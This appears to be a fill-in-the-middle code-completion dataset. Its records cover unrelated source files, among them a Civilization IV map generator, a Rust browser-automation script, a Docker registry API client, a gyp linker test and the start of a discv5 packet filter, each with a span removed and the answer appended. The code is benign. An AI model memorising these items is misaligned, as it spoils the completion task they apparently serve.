grain_amount=3):
# Check for changes to User Input variances.
self.checkForOverrideDefaultUserInputVariances()
self.hillsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, grain_amount, self.mapRand, 0, self.fracXExp, self.fracYExp)
self.peaksFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, grain_amount+1, self.mapRand, 0, self.fracXExp, self.fracYExp)
water_percent += self.seaLevelChange
water_percent = min(water_percent, 14)
water_percent = max(water_percent, 7)
iWaterThreshold = self.continentsFrac.getHeightFromPercent(water_percent)
iHillsBottom1 = self.hillsFrac.getHeightFromPercent(max((self.hillGroupOneBase - self.hillGroupOneRange), 0))
iHillsTop1 = self.hillsFrac.getHeightFromPercent(min((self.hillGroupOneBase + self.hillGroupOneRange), 100))
iHillsBottom2 = self.hillsFrac.getHeightFromPercent(max((self.hillGroupTwoBase - self.hillGroupTwoRange), 0))
iHillsTop2 = self.hillsFrac.getHeightFromPercent(min((self.hillGroupTwoBase + self.hillGroupTwoRange), 100))
iPeakThreshold = self.peaksFrac.getHeightFromPercent(self.peakPercent)
for x in range(self.iNumPlotsX):
for y in range(self.iNumPlotsY):
i = y*self.iNumPlotsX + x
val = self.continentsFrac.getHeight(x,y)
if val <= iWaterThreshold:
self.plotTypes[i] = PlotTypes.PLOT_OCEAN
else:
hillVal = self.hillsFrac.getHeight(x,y)
if ((hillVal >= iHillsBottom1 and hillVal <= iHillsTop1) or (hillVal >= iHillsBottom2 and hillVal <= iHillsTop2)):
peakVal = self.peaksFrac.getHeight(x,y)
if (peakVal <= iPeakThreshold):
self.plotTypes[i] = PlotTypes.PLOT_PEAK
else:
self.plotTypes[i] = PlotTypes.PLOT_HILLS
else:
self.plotTypes[i] = PlotTypes.PLOT_LAND
if shift_plot_types:
self.shiftPlotTypes()
return self.plotTypes
def generatePlotTypes():
"generate a very grainy world for lots of little lakes"
NiTextOut("Setting Plot Types (Python Fantasy Realm) ...")
global fractal_world
fractal_world = FantasyFractalWorld()
fractal_world.initFractal(continent_grain = 3, rift_grain = -1, has_center_rift = False, invert_heights = True)
plot_types = fractal_world.generatePlotTypes(water_percent = 10)
return plot_types
# subclass TerrainGenerator to redefine everything. This is a regional map.
class FantasyTerrainGenerator(CvMapGeneratorUtil.TerrainGenerator):
def __init__(self, fracXExp=-1, fracYExp=-1):
self.gc = CyGlobalContext()
self.map = CyMap()
self.grain_amount = 7
self.iWidth = self.map.getGridWidth()
self.iHeight = self.map.getGridHeight()
self.mapRand = self.gc.getGame().getMapRand()
self.iFlags = 0 # Disallow FRAC_POLAR flag, to prevent "zero row" problems.
self.fantasy=CyFractal()
self.fracXExp = fracXExp
self.fracYExp = fracYExp
self.initFractals()
def initFractals(self):
self.fantasy.fracInit(self.iWidth, self.iHeight, self.grain_amount, self.mapRand, self.iFlags, self.fracXExp, self.fracYExp)
self.iTen = self.fantasy.getHeightFromPercent(10)
self.iTwenty = self.fantasy.getHeightFromPercent(20)
self.iTwentySeven = self.fantasy.getHeightFromPercent(27)
self.iThirtyFive = self.fantasy.getHeightFromPercent(35)
self.iFortyFive = self.fantasy.getHeightFromPercent(45)
self.iFiftyFive = self.fantasy.getHeightFromPercent(55)
self.iSixtyFive = self.fantasy.getHeightFromPercent(65)
self.iSeventyFive = self.fantasy.getHeightFromPercent(75)
self.iEighty = self.fantasy.getHeightFromPercent(80)
self.iNinety = self.fantasy.getHeightFromPercent(90)
self.terrainDesert = self.gc.getInfoTypeForString("TERRAIN_DESERT")
self.terrainPlains = self.gc.getInfoTypeForString("TERRAIN_PLAINS")
self.terrainGrass = self.gc.getInfoTypeForString("TERRAIN_GRASS")
self.terrainIce = self.gc.getInfoTypeForString("TERRAIN_SNOW")
self.terrainTundra = self.gc.getInfoTypeForString("TERRAIN_TUNDRA")
def generateTerrainAtPlot(self,iX,iY):
if (self.map.plot(iX, iY).isWater()):
return self.map.plot(iX, iY).getTerrainType()
else:
val = self.fantasy.getHeight(iX, iY)
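            # terrain comes in fractal-height bands (snow above 90%, grass 80-90%,
            # desert 75-80%, ...) to produce the deliberately scrambled fantasy climate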
if val >= self.iNinety:
terrainVal = self.terrainIce
elif val >= self.iEighty:
terrainVal = self.terrainGrass
elif val >= self.iSeventyFive:
terrainVal = self.terrainDesert
elif val >= self.iSixtyFive:
terrainVal = self.terrainPlains
elif val >= self.iFiftyFive:
terrainVal = self.terrainTundra
elif val >= self.iFortyFive:
terrainVal = self.terrainGrass
elif val >= self.iThirtyFive:
terrainVal = self.terrainPlains
elif val >= self.iTwentySeven:
terrainVal = self.terrainTundra
elif val >= self.iTwenty:
terrainVal = self.terrainIce
elif val < self.iTen:
terrainVal = self.terrainGrass
else:
terrainVal = self.terrainDesert
if (terrainVal == TerrainTypes.NO_TERRAIN):
return self.map.plot(iX, iY).getTerrainType()
return terrainVal
def generateTerrainTypes():
NiTextOut("Generating Terrain (Python Fantasy Realm) ...")
terraingen = FantasyTerrainGenerator()
terrainTypes = terraingen.generateTerrain()
return terrainTypes
class FantasyFeatureGenerator(CvMapGeneratorUtil.FeatureGenerator):
def __init__(self, iJunglePercent=20, iForestPercent=30,
forest_grain=6, fracXExp=-1, fracYExp=-1):
self.gc = CyGlobalContext()
self.map = CyMap()
self.mapRand = self.gc.getGame().getMapRand()
self.forests = CyFractal()
self.iFlags = 0
self.iGridW = self.map.getGridWidth()
self.iGridH = self.map.getGridHeight()
self.iJunglePercent = iJunglePercent
self.iForestPercent = iForestPercent
self.forest_grain = forest_grain + self.gc.getWorldInfo(self.map.getWorldSize()).getFeatureGrainChange()
self.fracXExp = fracXExp
self.fracYExp = fracYExp
self.__initFractals()
self.__initFeatureTypes()
def __initFractals(self):
self.forests.fracInit(self.iGridW, self.iGridH, self.forest_grain, self.mapRand, self.iFlags, self.fracXExp, self.fracYExp)
self.iJungleLevel = self.forests.getHeightFromPercent(100 - self.iJunglePercent)
self.iForestLevel = self.forests.getHeightFromPercent(self.iForestPercent)
def __initFeatureTypes(self):
self.featureJungle = self.gc.getInfoTypeForString("FEATURE_JUNGLE")
self.featureForest = self.gc.getInfoTypeForString("FEATURE_FOREST")
self.featureOasis = self.gc.getInfoTypeForString("FEATURE_OASIS")
self.featureFlood = self.gc.getInfoTypeForString("FEATURE_FLOOD_PLAINS")
self.featureIce = self.gc.getInfoTypeForString("FEATURE_ICE")
def addFeaturesAtPlot(self, iX, iY):
pPlot = self.map.sPlot(iX, iY)
if pPlot.isPeak(): pass
elif pPlot.isWater():
self.addIceAtPlot(pPlot, iX, iY)
else:
if pPlot.isRiverSide() and pPlot.isFlatlands():
self.addFloodAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addOasisAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addJunglesAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addForestsAtPlot(pPlot, iX, iY)
def addIceAtPlot(self, pPlot, iX, iY):
iceRoll = self.mapRand.get(35, "Add Feature PYTHON")
if iceRoll < 3:
pPlot.setFeatureType(self.featureIce, -1)
def | (self, pPlot, iX, iY):
if pPlot.getTerrainType() == self.gc.getInfoTypeForString("TERRAIN_DESERT") or pPlot.getTerrainType() == self.gc.getInfoTypeForString("TERRAIN_SNOW"):
pPlot.setFeatureType(self.featureFlood, -1)
def addOasisAtPlot(self, pPlot, iX, iY):
if not pPlot.isFreshWater():
if pPlot.getTerrainType() != self.gc.getInfoTypeForString("TERRAIN_GRASS"):
if self.mapRand.get(30, "Add Feature PYTHON") == 23:
pPlot.setFeatureType(self.featureOasis, -1)
def addJunglesAtPlot(self, pPlot, iX, iY):
# Warning: this version of JunglesAtPlot is using the forest fractal!
if (self.forests.getHeight(iX, iY) >= self.iJungleLevel):
pPlot.setFeatureType(self.featureJungle, -1)
def addForestsAtPlot(self, pPlot, iX, iY):
if self.forests.getHeight(iX, iY) <= self.iForestLevel:
varietyRoll = self.mapRand.get(3, "Forest Variety - Fantasy PYTHON")
pPlot.setFeatureType(self.featureForest, varietyRoll)
def addFeatures():
global featuregen
NiTextOut("Adding Features (Python Fantasy Realm) ...")
featuregen = FantasyFeatureGenerator()
featuregen.addFeatures()
return 0
# Init bonus lists.
forcePlacementOnFlats = ('BONUS_GOLD', 'BONUS_SILVER', 'BONUS_COAL', 'BONUS_ALUMINUM')
forcePlacementOnHills = ('BONUS_BANANA', 'BONUS_RICE', 'BONUS_SUGAR', 'BONUS_OIL')
forcePlacementInFloodPlains = ('BONUS_INCENSE',)  # trailing comma keeps this a tuple, not a plain string
forcePlacementInJungle = ('BONUS_HORSE', 'BONUS_WHEAT')
forcePlacementInForest = ('BONUS_GOLD', 'BONUS_SILVER', 'BONUS_COAL', 'BONUS_ALUMINUM')
forceNotInGrass = ('BONUS_COW', 'BONUS_CORN', 'BONUS_RICE', 'BONUS_PIG', 'BONUS_IVORY')
forceNotInDesert = ('BONUS_OIL', 'BONUS_STONE', 'BONUS_IRON', 'BONUS_COPPER')
forceNotInSnow = ('BONUS_SILVER', 'BONUS_DEER', 'BONUS_FUR')
forceNotInPlains = ('BONUS_WINE', 'BONUS_SHEEP', 'BONUS_MARBLE', 'BONUS_IVORY')
forceNotInJungle = ('BONUS_BANANA', 'BONUS_SUGAR', 'BONUS_DYE', 'BONUS_OIL', 'BONUS_GEMS')
forceNotInForest = ('BONUS_DEER', 'BONUS_SILK', 'BONUS_SPICES', 'BONUS_URANIUM')
forceNotInFreshWater = ('BONUS_RICE', 'BONUS_CORN', 'BONUS_WHEAT', 'BONUS_SUGAR')
seaResources = ('BONUS_CLAM', 'BONUS_CRAB', 'BONUS_FISH', 'BONUS_WHALE')
def addBonusType(argsList):
[iBonusType] = argsList
gc = CyGlobalContext()
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources == 0:
CyPythonMgr().allowDefaultImpl()
return
# Skip eliminated or crazy resources, plus handle sea-based resources in default way.
type_string = gc.getBonusInfo(iBonusType).getType()
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game
global eliminated_resources
global crazy_types
if userInputResources == 2:
if type_string in eliminated_resources: # None of this type will appear!
return None
if type_string == crazy_food or type_string == crazy_luxury or type_string == crazy_strategic or type_string == crazy_late_game:
crazy_types.append(iBonusType)
return None # Crazy resources will be added in afterGeneration()
if type_string in seaResources:
CyPythonMgr().allowDefaultImpl()
return
# Now place the rest of the resources.
dice = gc.getGame().getMapRand()
iW = map.getGridWidth()
iH = map.getGridHeight()
# init forced-eligibility flags
forceFlats = False
forceHills = False
forceFlood = False
forceJungle = False
forceForest = False
forceNoGrass = False
forceNoDesert = False
forceNoSnow = False
forceNoPlains = False
forceNoJungle = False
forceNoForest = False
forceNoFresh = False
if type_string in forcePlacementOnFlats: forceFlats = True
if type_string in forcePlacementOnHills: forceHills = True
if type_string in forcePlacementInFloodPlains: forceFlood = True
if type_string in forcePlacementInJungle: forceJungle = True
if type_string in forcePlacementInForest: forceForest = True
if type_string in forceNotInGrass: forceNoGrass = True
if type_string in forceNotInDesert: forceNoDesert = True
if type_string in forceNotInSnow: forceNoSnow = True
if type_string in forceNotInPlains: forceNoPlains = True
if type_string in forceNotInJungle: forceNoJungle = True
if type_string in forceNotInForest: forceNoForest = True
if type_string in forceNotInFreshWater: forceNoFresh = True
# determine number of bonuses to place (defined as count)
# size modifier is a fixed component based on world size
sizekey = map.getWorldSize()
sizevalues = {
WorldSizeTypes.WORLDSIZE_DUEL: 1,
WorldSizeTypes.WORLDSIZE_TINY: 1,
WorldSizeTypes.WORLDSIZE_SMALL: 1,
WorldSizeTypes.WORLDSIZE_STANDARD: 2,
WorldSizeTypes.WORLDSIZE_LARGE: 2,
WorldSizeTypes.WORLDSIZE_HUGE: 3
}
sizemodifier = sizevalues[sizekey]
# playermodifier involves two layers of randomnity.
players = gc.getGame().countCivPlayersEverAlive()
plrcomponent1 = int(players / 3.0) # Bonus Method Fixed Component
plrcomponent2 = dice.get(players, "Bonus Method Abundant Component - Fantasy Realm PYTHON") + 1
plrcomponent3 = dice.get(int(players / 1.6), "Bonus Method Medium Component - Fantasy Realm PYTHON") - 1
plrmethods = [plrcomponent1, plrcomponent2, plrcomponent3, plrcomponent2]
playermodifier = plrmethods[dice.get(4, "Bonus Method - Fantasy Realm PYTHON")]
count = sizemodifier + playermodifier
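    # Worked example (assumed scenario): a Standard map gives sizemodifier 2; with
    # 6 players, plrcomponent1 = 2, plrcomponent2 falls in 1..6 and plrcomponent3 in -1..1,
    # so count usually lands between 1 and 8 before the short-straw check below.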
if count <= 0:
return None # This bonus drew a short straw. None will be placed!
# Set plot eligibility for current bonus.
# Begin by initiating the list, into which eligible plots will be recorded.
eligible = []
# Loop through all plots on the map, adding eligible plots to the list.
for x in range(iW):
for y in range(iH):
# First check the plot for an existing bonus.
pPlot = map.plot(x,y)
if pPlot.isPeak() or pPlot.isWater(): continue # to next plot.
if pPlot.getBonusType(-1) != -1: continue # to next plot.
if pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_OASIS"): continue # Soren wants no bonuses in oasis plots. So mote it be.
# Check plot type and features for eligibility.
if forceHills and not pPlot.isHills(): continue
if forceFlats and not pPlot.isFlatlands(): continue
if forceFlood and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FLOOD_PLAINS"): continue
if forceJungle and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_JUNGLE"): continue
if forceForest and not pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FOREST"): continue
if forceNoGrass and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_GRASS"): continue
if forceNoDesert and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_DESERT"): continue
if forceNoSnow and (pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_TUNDRA") or pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_SNOW")): continue
if forceNoPlains and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_PLAINS"): continue
if forceNoJungle and pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_JUNGLE"): continue
if forceNoForest and pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_FOREST"): continue
if forceNoFresh and pPlot.isFreshWater(): continue
#
# Finally we have run all the checks.
# 1. The plot has no bonus.
# 2. The plot has an eligible terrain and feature type.
# Now we append this plot to the eligible list.
eligible.append([x,y])
# Now we assign the bonuses to eligible plots chosen completely at random.
while count > 0:
if eligible == []: break # No eligible plots left!
index = dice.get(len(eligible), "Bonus Placement - Fantasy Realm PYTHON")
[x,y] = eligible[index]
map.plot(x,y).setBonusType(iBonusType)
del eligible[index] # Remove this plot from the eligible list.
count = count - 1 # Reduce number of bonuses left to place.
# This bonus type is done.
return None
def afterGeneration():
gc = CyGlobalContext()
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources != 2: # Logical or Irrational resources (already handled).
return None
# Place "Crazy" resources!
NiTextOut("Placing Crazy Resources (Python Fantasy Realm) ...")
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game, crazy_types
dice = gc.getGame().getMapRand()
iW = map.getGridWidth()
iH = map.getGridHeight()
crazies = CyFractal()
crazies.fracInit(iW, iH, 7, dice, 0, -1, -1)
crazyOne = crazies.getHeightFromPercent(10)
crazyTwo = crazies.getHeightFromPercent(30)
crazyThree = crazies.getHeightFromPercent(45)
crazyFour = crazies.getHeightFromPercent(55)
crazyFive = crazies.getHeightFromPercent(70)
for x in range(iW):
for y in range(iH):
# Fractalized placement of crazy resources.
pPlot = map.plot(x,y)
if pPlot.getBonusType(-1) != -1: continue # A bonus already exists in this plot!
if pPlot.isWater() or pPlot.isPeak() or pPlot.getFeatureType() == gc.getInfoTypeForString("FEATURE_OASIS"): continue
crazyVal = crazies.getHeight(x,y)
for crazy_bonus in crazy_types:
type_string = gc.getBonusInfo(crazy_bonus).getType()
if type_string == crazy_food:
if (crazyVal >= crazyTwo and crazyVal < crazyThree) and (pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_TUNDRA") or pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_SNOW")):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_luxury:
if (crazyVal >= crazyFour and crazyVal < crazyFive) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_GRASS"):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_strategic:
if (crazyVal >= crazyThree and crazyVal < crazyFour) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_PLAINS"):
map.plot(x,y).setBonusType(crazy_bonus)
if type_string == crazy_late_game:
if (crazyVal >= crazyOne and crazyVal < crazyTwo) and pPlot.getTerrainType() == gc.getInfoTypeForString("TERRAIN_DESERT"):
map.plot(x,y).setBonusType(crazy_bonus)
# Finito
return None
def normalizeRemovePeaks():
return None
def normalizeRemoveBadTerrain():
return None
def normalizeRemoveBadFeatures():
return None
def normalizeAddGoodTerrain():
return None
| addFloodAtPlot |
main.rs | use fantoccini::{Client, Locator};
use std::time::Duration;
use tokio::time::delay_for;
#[tokio::main]
async fn | () -> Result<(), Box<dyn std::error::Error>> {
// expects WebDriver instance to be listening at port 4444
let mut client = Client::new("http://localhost:4444")
.await
.expect("failed to connect to WebDriver");
client.goto("https://www.rust-lang.org/").await?;
    // delay_for is an artificial delay used only to watch the browser's actions; it is
    // not necessary in your own code
delay_for(Duration::from_millis(3000)).await;
let get_started_button =
r#"//a[@class="button button-download ph4 mt0 w-100" and @href="/learn/get-started"]"#;
let element = client.find(Locator::XPath(get_started_button)).await?;
element.click().await?;
delay_for(Duration::from_millis(3000)).await;
let try_without_installing_button =
r#"//a[@class="button button-secondary" and @href="https://play.rust-lang.org/"]"#;
let element = client
.find(Locator::XPath(try_without_installing_button))
.await?;
element.click().await?;
delay_for(Duration::from_millis(3000)).await;
let play_rust_lang_run_button = r#"//div[@class="segmented-button"]/button[1]"#;
let element = client
.find(Locator::XPath(play_rust_lang_run_button))
.await?;
element.click().await?;
delay_for(Duration::from_millis(6000)).await;
Ok(())
}
| main |
registry.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# bug-report: [email protected]
""" api for docker registry """
import urllib2
import urllib
import json
import base64
class RegistryException(Exception):
""" registry api related exception """
pass
class RegistryApi(object):
""" interact with docker registry and harbor """
def __init__(self, username, password, registry_endpoint):
self.username = username
self.password = password
self.basic_token = base64.encodestring("%s:%s" % (str(username), str(password)))[0:-1]
self.registry_endpoint = registry_endpoint.rstrip('/')
#print("%s/v2/_catalog" % (self.registry_endpoint,))
auth = self.pingRegistry("%s/v2/_catalog" % (self.registry_endpoint,))
if auth is None:
raise RegistryException("get token realm and service failed")
self.token_endpoint = auth[0]
self.service = auth[1]
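    # Usage sketch (endpoint and credentials below are hypothetical):
    #   api = RegistryApi("admin", "Harbor12345", "http://harbor.local")
    #   repos = api.getRepositoryList(n=50)              # {'repositories': [...]}
    #   tags = api.getTagList(repos["repositories"][0])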
def pingRegistry(self, registry_endpoint):
""" ping v2 registry and get realm and service """
headers = dict()
try:
res = urllib2.urlopen(registry_endpoint) | try:
(realm, service, _) = headers['www-authenticate'].split(',')
return (realm[14:-1:], service[9:-1])
except Exception as e:
return None
def getBearerTokenForScope(self, scope):
""" get bearer token from harbor """
payload = urllib.urlencode({'service': self.service, 'scope': scope})
url = "%s?%s" % (self.token_endpoint, payload)
req = urllib2.Request(url)
req.add_header('Authorization', 'Basic %s' % (self.basic_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())["token"]
except Exception as e:
return None
def getRepositoryList(self, n=None):
""" get repository list """
scope = "registry:catalog:*"
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/_catalog" % (self.registry_endpoint,)
if n is not None:
url = "%s?n=%s" % (url, str(n))
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getTagList(self, repository):
""" get tag list for repository """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/tags/list" % (self.registry_endpoint, repository)
req = urllib2.Request(url)
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def getManifest(self, repository, reference="latest", v1=False):
""" get manifest for tag or digest """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return json.loads(response.read())
except Exception as e:
return None
def existManifest(self, repository, reference, v1=False):
""" check to see it manifest exist """
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("manifestExist failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, reference)
req = urllib2.Request(url)
req.get_method = lambda: 'HEAD'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
if v1:
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v1+json')
try:
response = urllib2.urlopen(req)
return (True, response.headers.dict["docker-content-digest"])
except Exception as e:
return (False, None)
def deleteManifest(self, repository, reference):
""" delete manifest by tag """
(is_exist, digest) = self.existManifest(repository, reference)
if not is_exist:
raise RegistryException("manifest not exist")
scope = "repository:%s:pull,push" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
raise RegistryException("delete manifest failed due to token error")
url = "%s/v2/%s/manifests/%s" % (self.registry_endpoint, repository, digest)
req = urllib2.Request(url)
req.get_method = lambda: 'DELETE'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
try:
urllib2.urlopen(req)
except Exception as e:
return False
return True
def getManifestWithConf(self, repository, reference="latest"):
""" get manifest for tag or digest """
manifest = self.getManifest(repository, reference)
if manifest is None:
raise RegistryException("manifest for %s %s not exist" % (repository, reference))
config_digest = manifest["config"]["digest"]
scope = "repository:%s:pull" % (repository,)
bear_token = self.getBearerTokenForScope(scope)
if bear_token is None:
return None
url = "%s/v2/%s/blobs/%s" % (self.registry_endpoint, repository, config_digest)
req = urllib2.Request(url)
req.get_method = lambda: 'GET'
req.add_header('Authorization', r'Bearer %s' % (bear_token,))
req.add_header('Accept', 'application/vnd.docker.distribution.manifest.v2+json')
try:
response = urllib2.urlopen(req)
manifest["configContent"] = json.loads(response.read())
return manifest
except Exception as e:
return None | except urllib2.HTTPError as e:
headers = e.hdrs.dict |
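# Added sketch (not part of the original client above): given an instance
# `client` of the registry class, walk every repository/tag pair. The response
# shapes ({"repositories": [...]} and {"name": ..., "tags": [...]}) are the
# standard Docker Registry v2 payloads the methods above return.
def list_all_tags(client, page_size=100):
    """Yield (repository, tag) pairs for every repository in the catalog."""
    catalog = client.getRepositoryList(n=page_size)
    if catalog is None:
        return
    for repo in catalog.get("repositories", []):
        tag_list = client.getTagList(repo)
        if tag_list is None:
            continue
        for tag in tag_list.get("tags") or []:
            yield (repo, tag)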
gyptest-link-base-address.py | #!/usr/bin/env python
# Copyright 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure the base address setting is extracted properly.
"""
import TestGyp
import re
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'linker-flags'
test.run_gyp('base-address.gyp', chdir=CHDIR)
test.build('base-address.gyp', test.ALL, chdir=CHDIR)
def GetHeaders(exe):
full_path = test.built_file_path(exe, chdir=CHDIR)
return test.run_dumpbin('/headers', full_path)
# Extract the image base address from the headers output.
image_base_reg_ex = re.compile(r'.*\s+([0-9]+) image base.*', re.DOTALL)
exe_headers = GetHeaders('test_base_specified_exe.exe')
exe_match = image_base_reg_ex.match(exe_headers)
  if not exe_match or not exe_match.group(1):
    test.fail_test()
if exe_match.group(1) != '420000':
test.fail_test()
dll_headers = GetHeaders('test_base_specified_dll.dll')
dll_match = image_base_reg_ex.match(dll_headers)
if not dll_match or not dll_match.group(1):
test.fail_test()
if dll_match.group(1) != '10420000':
test.fail_test()
default_exe_headers = GetHeaders('test_base_default_exe.exe')
default_exe_match = image_base_reg_ex.match(default_exe_headers)
if not default_exe_match or not default_exe_match.group(1):
test.fail_test()
if default_exe_match.group(1) != '400000':
test.fail_test()
default_dll_headers = GetHeaders('test_base_default_dll.dll')
default_dll_match = image_base_reg_ex.match(default_dll_headers)
if not default_dll_match or not default_dll_match.group(1):
test.fail_test()
if default_dll_match.group(1) != '10000000':
test.fail_test()
  test.pass_test()
fn-ptr-shim.rs | // compile-flags: -Zmir-opt-level=0 -Zvalidate-mir
// Tests that the `<fn() as Fn>` shim does not create a `Call` terminator with a `Self` callee
// (as only `FnDef` and `FnPtr` callees are allowed in MIR).
// EMIT_MIR core.ops-function-Fn-call.AddMovesForPackedDrops.before.mir
fn main() {
call(noop as fn());
}
fn noop() {}
fn call<F: Fn()>(f: F) {
f();
}
pipeline_utils.py | """
File: pipeline_utils.py
Author: Jens Petit
Email: [email protected]
Github: https://github.com/j-petit
Description: Utility functions for filtering models
"""
import re
def createDiffs(model1, model2, filename):
"""Takes two models and creates constraint variables out of their paths.
Parameters
----------
model1 : mplus model object
model2 : mplus model object
filename : string where to write diffs
"""
if len(model1.model) != len(model2.model):
raise Exception("Models not the same")
no_lines = len(model1.model)
not_diffs = 0
for i in range(no_lines):
if model1.labels[i] == model2.labels[i]:
not_diffs = not_diffs + 1
lines = []
start_line = "new(diff0-diff{});".format(no_lines - not_diffs - 1)
counter = 0
for i in range(no_lines):
if model1.labels[i] == model2.labels[i]:
line = "diffX = {1} - {2};".format(i, model1.labels[i],
model2.labels[i])
line = "! " + line
else:
line = "diff{0} = {1} - {2};".format(counter, model1.labels[i],
model2.labels[i])
counter = counter + 1
lines.append(line)
with open(filename, 'a') as f:
f.write("MODEL CONSTRAINT:\n")
f.write(start_line + "\n")
for line in lines:
f.write(line + "\n")
def filterDiffs(threshold, filename, var_name):
| """Searches for lines starting with var_name in file and indexes them.
Parameters
----------
threshold : float indicating which lines to consider
filename : string specifying file
var_name : string to search for in file
"""
to_match = '^' + var_name.upper()
match_counter = 0
    same_paths = []
    found = False
with open(filename) as fp:
for line in fp:
line = line.strip(None)
if (line == "New/Additional Parameters"):
found = True
if (line == ""):
found = False
if (re.match(to_match, line) and found):
value = float(line.split()[4])
if value < threshold:
same_paths.append(match_counter)
match_counter = match_counter + 1
    return same_paths
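# Added sketch (not part of the original module): how createDiffs and
# filterDiffs are meant to be chained. `model1`/`model2` are assumed to be
# mplus model objects exposing `.model` and `.labels` as used above, and
# `results_file` is the Mplus output that contains the estimated diff values.
def diffPipeline(model1, model2, constraint_file, results_file, threshold=0.05):
    """Write diff constraints for two models, then index non-significant diffs."""
    createDiffs(model1, model2, constraint_file)
    return filterDiffs(threshold, results_file, "diff")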
mod.rs | //! A filter which decides whether to accept/reject incoming UDP packets.
use crate::{discv5::PERMIT_BAN_LIST, metrics::METRICS, node_info::NodeAddress, packet::Packet};
use cache::ReceivedPacketCache;
use enr::NodeId;
use lru::LruCache;
use std::{
collections::HashSet,
net::{IpAddr, SocketAddr},
sync::atomic::Ordering,
time::{Duration, Instant},
};
use tracing::{debug, warn};
mod cache;
mod config;
pub mod rate_limiter;
pub use config::FilterConfig;
use rate_limiter::{LimitKind, RateLimiter};
/// The maximum number of IPs to retain when calculating the number of nodes per IP.
const KNOWN_ADDRS_SIZE: usize = 500;
/// The number of IPs to retain at any given time that have banned nodes.
const BANNED_NODES_SIZE: usize = 50;
/// The maximum number of packets to keep record of for metrics if the rate limiter is not
/// specified.
const DEFAULT_PACKETS_PER_SECOND: usize = 20;
/// The packet filter which decides whether we accept or reject incoming packets.
pub(crate) struct Filter {
/// Whether the filter is enabled or not.
enabled: bool,
/// An optional rate limiter for incoming packets.
rate_limiter: Option<RateLimiter>,
/// An ordered (by time) collection of recently seen packets by SocketAddr. The packet data is not
/// stored here. This stores 5 seconds of history to calculate a 5 second moving average for
/// the metrics.
raw_packets_received: ReceivedPacketCache<SocketAddr>,
/// The duration that bans by this filter last.
ban_duration: Option<Duration>,
/// Keep track of node ids per socket. If someone is using too many node-ids per IP, they can
/// be banned.
known_addrs: LruCache<IpAddr, HashSet<NodeId>>,
/// Keep track of Ips that have banned nodes. If a single IP has many nodes that get banned,
/// then we ban the IP address.
banned_nodes: LruCache<IpAddr, usize>,
/// The maximum number of node-ids allowed per IP address before the IP address gets banned.
/// Having this set to None, disables this feature. Default value is 10.
pub max_nodes_per_ip: Option<usize>,
/// The maximum number of nodes that can be banned by a single IP before that IP gets banned.
/// The default is 5.
pub max_bans_per_ip: Option<usize>,
}
impl Filter {
pub fn new(config: FilterConfig, ban_duration: Option<Duration>) -> Filter {
let expected_packets_per_second = config
.rate_limiter
.as_ref()
.map(|v| v.total_requests_per_second().round() as usize)
.unwrap_or(DEFAULT_PACKETS_PER_SECOND);
Filter {
enabled: config.enabled,
rate_limiter: config.rate_limiter,
raw_packets_received: ReceivedPacketCache::new(
expected_packets_per_second,
METRICS.moving_window,
),
known_addrs: LruCache::new(KNOWN_ADDRS_SIZE),
banned_nodes: LruCache::new(BANNED_NODES_SIZE),
ban_duration,
